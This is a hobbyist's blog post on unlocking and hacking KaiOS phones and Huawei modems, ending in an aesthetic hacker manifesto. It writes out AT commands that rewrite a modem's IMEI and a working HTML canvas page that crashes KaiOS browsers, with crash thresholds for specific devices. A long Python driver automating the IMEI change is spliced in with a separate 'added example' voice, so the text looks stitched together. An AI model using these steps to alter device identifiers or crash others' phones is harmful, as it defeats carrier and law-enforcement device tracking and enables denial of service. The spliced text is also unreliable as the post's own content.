On attitude, part 2

Before I continue with anything in this blog, let me make something perfectly clear…

Whatever I do with mobile technologies, I don’t do it for a living. I earn my money in a completely different area that has absolutely nothing to do with mobiles. And I absolutely don’t promote any mobile brand (be it hardware or software). In fact, they are all equally bad to me, but some of them are at least tolerable. So, what do I earn here, besides some (a bit debatable) respect from the community?

First, experience. A lot of it. Even after my recent post, I was able to do a lot of new things. I managed to create a fake voicemail notification message with a message count (more on that in one of the next posts). I managed to relock an “unlockable” Huawei E173z-1 HSPA modem from one carrier to mine. I managed to find a readable Huawei Datalock V2 algorithm implementation (planning to refactor it from Python 2 to Kotlin) and to change the modem’s IMEI with it:

AT^DATALOCK="this_v2_code"
AT^CIMEI="new_15_digit_imei"
AT^INFORBU
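As an added example that is not the post’s code (the Datalock V2 implementation the post mentions is not reproduced, so the unlock code is taken as an input), here is a small Python driver for that three-command sequence. It validates the new IMEI’s Luhn check digit before touching the modem, waits for a final result code after each command, and stops at the first reply that is not OK so the IMEI is never written after a failed unlock. The modem is a constructed fake so the script runs offline; FakeModem, send_at, change_imei and the response format they assume are mine, and with pyserial you would pass a serial.Serial object in place of the fake, since only write() and readline() are used.

```python
"""Added example (not the post's code): drive the AT^DATALOCK / AT^CIMEI /
AT^INFORBU sequence fail-closed.  The modem below is a constructed fake; with
pyserial you would pass serial.Serial(port, 115200, timeout=2) instead."""
import re

# Final result codes that terminate one AT command's response (3GPP TS 27.007 style).
FINAL_RESULT = re.compile(r"^(OK|ERROR|\+CM[ES] ERROR: .*)$")


def imei_check_digit(body14: str) -> str:
    """Luhn check digit for the first 14 digits (TAC + serial) of an IMEI."""
    total = 0
    for i, ch in enumerate(body14):
        d = int(ch)
        if i % 2 == 1:            # double the 2nd, 4th, ... digits (odd 0-based index)
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def valid_imei(imei: str) -> bool:
    """15 digits whose last digit is the Luhn check of the first 14."""
    return (len(imei) == 15 and imei.isdigit()
            and imei_check_digit(imei[:14]) == imei[14])


def send_at(port, cmd: str, max_lines: int = 20):
    """Write one command, read until a final result code.  Returns (ok, lines)."""
    port.write((cmd + "\r").encode())
    lines = []
    for _ in range(max_lines):
        raw = port.readline()
        if not raw:                        # read timeout: treat as failure
            break
        line = raw.decode(errors="replace").strip()
        if not line or line == cmd:        # skip blank lines and command echo (ATE1)
            continue
        lines.append(line)
        if FINAL_RESULT.match(line):
            return line == "OK", lines
    return False, lines


def change_imei(port, datalock_code: str, new_imei: str):
    """Run the post's three commands in order; stop at the first failure so the
    IMEI is never written, and the last step never run, after a bad unlock."""
    if not valid_imei(new_imei):
        raise ValueError("IMEI must be 15 digits with a valid Luhn check digit")
    steps = (f'AT^DATALOCK="{datalock_code}"',
             f'AT^CIMEI="{new_imei}"',
             "AT^INFORBU")
    log = []
    for cmd in steps:
        ok, lines = send_at(port, cmd)
        log.append((cmd, ok, lines))
        if not ok:
            break
    return log


class FakeModem:
    """Constructed stand-in for a serial port (assumption, not real firmware
    behaviour).  Answers OK only after a matching datalock code; does not echo."""

    def __init__(self, datalock_code: str):
        self._code = datalock_code
        self._unlocked = False
        self._rx = []

    def write(self, data: bytes) -> int:
        line = data.decode().strip()
        m = re.fullmatch(r'AT\^DATALOCK="([^"]*)"', line)
        if m:
            self._unlocked = (m.group(1) == self._code)
            self._rx.append(b"OK\r\n" if self._unlocked else b"ERROR\r\n")
        elif self._unlocked and re.fullmatch(r'AT\^CIMEI="\d{15}"', line):
            self._rx.append(b"OK\r\n")
        elif self._unlocked and line == "AT^INFORBU":
            self._rx.append(b"OK\r\n")
        else:
            self._rx.append(b"+CME ERROR: 3\r\n")   # 3 = operation not allowed
        return len(data)

    def readline(self) -> bytes:
        return self._rx.pop(0) if self._rx else b""


if __name__ == "__main__":
    # 490154203237518 is the widely used sample IMEI with a valid check digit.
    for code in ("this_v2_code", "wrong_code"):
        for cmd, ok, lines in change_imei(FakeModem("this_v2_code"), code, "490154203237518"):
            print(f"{cmd:32} -> {'OK' if ok else 'FAIL'} {lines}")
```

The point of the loop is the early break: a real port that answers ERROR to the datalock step must never see the CIMEI write, and a typo in the IMEI is caught locally before any command is sent.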

I managed to find out that the recently received CAT B35 also has firmware signed with 6.0.1 test-keys (just like Nokia 8110 4G firmware before v13), even after the recent update, and its “security” relies on the mere fact that no one has been able to manually enter the recovery menu yet.

I also learned about a Canvas vulnerability that each and every KaiOS device is exposed to:

<!DOCTYPE html>
<html>
<head>
  <meta charset=utf-8>
  <title>Malevich attack</title>
</head>
<body>
  <canvas id="canvas" width="500" height="500"> </canvas>
  <script>
    var canvas = document.getElementById("canvas");
    var width = canvas.width;
    var height = canvas.height;
    var ctx = canvas.getContext("2d");
    var N = 1495;
    // No beginPath() inside the loop: every segment stays on the current path,
    // so the i-th stroke() redraws all i segments accumulated so far (about
    // N*N/2 segment draws in total), and segments with i >= width end outside
    // the canvas. The whole canvas ends up black.
    for (var i = 0; i < N; i++) {
      ctx.moveTo(i % width, 0);
      ctx.lineTo(i, height);
      ctx.stroke();
    }
  </script>
</body>
</html>

This code is a simpler version, already modified by me, that draws a black square instead of stripes as in the original CVE report. That’s why I call it the “Malevich attack”.
You can manipulate N and observe the behavior on different devices: either a full Gecko crash or a background shell crash that occurs when you exit the browser. The N values that start triggering the background/foreground crash are around 1181/1495 for the B35 and 1121/1435 for the 8110 4G (v13/GerdaOS) respectively. This has yet to be exploited, but the power of this attack has been clearly noticed.

Not to mention that I created an alternative keyboard implementation for the Xiaomi Qin 1s. So yes, experience is definitely my first gain from this. But it’s not the only one, and not even the main one. What’s the second one?

Well, the second one is not so easy to explain. You see, all of this is a sort of art. Like that Black Square painting by Malevich. A simple, blunt and radical form of art that carries a message. This is why very few people understood Malevich back then, and very few people can understand my real motives right now. They are almost entirely non-political, they are almost entirely aesthetic. I value freedom, especially freedom of communication, but I value aesthetics even more. Freedom of communication is just some means for the people of the world to do… To do what?

If you try rationalizing this whole obsession of mine with infosec (and mobile security in particular), you’ll end up at a dead end. Because there’s one more obsession beyond this which can’t be explained, rationalized or calculated. I don’t do this because I find it useful, I do this because I find it beautiful. It’s all about aesthetics - the almighty religion that penetrates the minds of even the most hardcore atheists (like me). Heck, even the Third Reich had one, and was particularly obsessed with it. Yes, aesthetics is such a powerful thing that even the most horrible worldwide crimes can be committed in its name. Committed, pushed and merged.

And of course, just like suprematism (not to be confused with supremacism) led by Malevich himself, it’s also about sending a message. What message? To whom? Well, it’s a message to all who try making money out of the beauty that should be accessible to everyone for free. To all the scum that tries to sell you mere digits so that you can unlock the phone or modem you already bought with your own money. To all the lowlifes who try to make your privacy vulnerable by locking you down to Faildows, the worst platform in existence, to be able to accomplish certain tasks. To all the noobs who can’t think outside of what the morons and pseudo-elitist script kiddies they consider “gurus” told them, and to those self-proclaimed “gurus” as well.

And my message to all those parasites is simple: there is a world without you. My ultimate goal is to just show everyone else that it is possible to create such a world. In the name of freedom, in the name of beauty and for the sake of opening up much more technological wonders, which you are trying to monopolize and monetize, to the entire planet.
And, just so you know, I’m not alone in this effort.

I am a hacker, and this is my manifesto. You may stop this individual,
but you can’t stop us all… after all, we’re all alike.
© The Mentor, 1986
